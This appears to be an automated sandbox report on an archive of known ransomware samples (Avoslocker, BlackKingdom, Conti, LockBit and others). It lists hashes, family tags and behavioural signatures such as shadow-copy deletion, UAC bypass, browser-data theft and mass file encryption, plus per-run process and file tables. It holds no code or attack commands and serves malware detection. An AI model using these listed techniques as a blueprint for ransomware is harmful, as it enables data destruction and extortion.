Malware Analysis Report

2024-09-22 15:34

Sample ID 240707-re689awdpe
Target RS.7z
SHA256 c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9
Tags
pyinstaller 512478c08dada2af19e49808fbda5b0b upx cryptone packer $2a$10$kmb3nsvqxc.93gyncgky/uq9hyhivf0e3hcajfiifr8hf3fmnofgm 7258 $2a$10$dfjplrxudytff.kmytq1rogsxjtjee8emqt65ftxltpjtxpzrhsaq 7178 blackmatter medusalocker mespinoza sodinokibi avoslocker ransomware spyware stealer darkside avaddon defense_evasion evasion execution impact persistence trojan babuk makop conti hive hades dearcry lockbit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9

Threat Level: Known bad

The file RS.7z was found to be: Known bad.

Malicious Activity Summary

pyinstaller 512478c08dada2af19e49808fbda5b0b upx cryptone packer $2a$10$kmb3nsvqxc.93gyncgky/uq9hyhivf0e3hcajfiifr8hf3fmnofgm 7258 $2a$10$dfjplrxudytff.kmytq1rogsxjtjee8emqt65ftxltpjtxpzrhsaq 7178 blackmatter medusalocker mespinoza sodinokibi avoslocker ransomware spyware stealer darkside avaddon defense_evasion evasion execution impact persistence trojan babuk makop conti hive hades dearcry lockbit

MedusaLocker payload

Makop

UAC bypass

Avoslocker Ransomware

Mespinoza family

Conti Ransomware

Detects Go variant of Hive Ransomware

Sodinokibi family

BlackMatter Ransomware

Avaddon

Blackmatter family

Hades payload

Hades Ransomware

Lockbit

Hive

Medusalocker family

DarkSide

Babuk Locker

DearCry

CryptOne packer

Modifies boot configuration data using bcdedit

Renames multiple (133) files with added filename extension

Renames multiple (179) files with added filename extension

Renames multiple (9368) files with added filename extension

Renames multiple (160) files with added filename extension

Renames multiple (3331) files with added filename extension

Renames multiple (150) files with added filename extension

Renames multiple (7382) files with added filename extension

Renames multiple (153) files with added filename extension

Renames multiple (162) files with added filename extension

Renames multiple (8801) files with added filename extension

Renames multiple (164) files with added filename extension

Renames multiple (77) files with added filename extension

Renames multiple (227) files with added filename extension

Deletes shadow copies

Renames multiple (180) files with added filename extension

Renames multiple (158) files with added filename extension

Renames multiple (1641) files with added filename extension

Renames multiple (450) files with added filename extension

Renames multiple (7310) files with added filename extension

Renames multiple (7995) files with added filename extension

Renames multiple (6418) files with added filename extension

Renames multiple (66) files with added filename extension

Renames multiple (174) files with added filename extension

Renames multiple (246) files with added filename extension

Renames multiple (257) files with added filename extension

Drops file in Drivers directory

Deletes backup catalog

Boot or Logon Autostart Execution: Active Setup

UPX packed file

Deletes itself

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Boot or Logon Autostart Execution: Print Processors

Loads dropped DLL

Checks computer location settings

Enumerates connected drives

Adds Run key to start application

Looks up external IP address via web service

Drops desktop.ini file(s)

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Detects Pyinstaller

Unsigned PE

Enumerates physical storage devices

NSIS installer

Uses Task Scheduler COM API

Modifies registry class

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

System policy modification

Suspicious behavior: EnumeratesProcesses

Modifies Control Panel

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious behavior: MapViewOfSection

Interacts with shadow copies

Checks SCSI registry key(s)

Runs ping.exe

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-07-07 14:07

Signatures

Blackmatter family

blackmatter

MedusaLocker payload

Description Indicator Process Target
N/A N/A N/A N/A

Medusalocker family

medusalocker

Mespinoza family

mespinoza

Sodinokibi family

sodinokibi

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240704-en

Max time kernel

1563s

Max time network

1570s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Renames multiple (77) files with added filename extension

ransomware

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Network

N/A

Files

C:\MSOCache\GET_YOUR_FILES_BACK.txt

MD5 0237b63f764204e00d7242cc4d908271
SHA1 9d88e59463e2a963bea95d6a2cc5383e922f2f27
SHA256 7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857
SHA512 0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e

Analysis: behavioral9

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240704-en

Max time kernel

1799s

Max time network

1568s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2148 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 2148 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
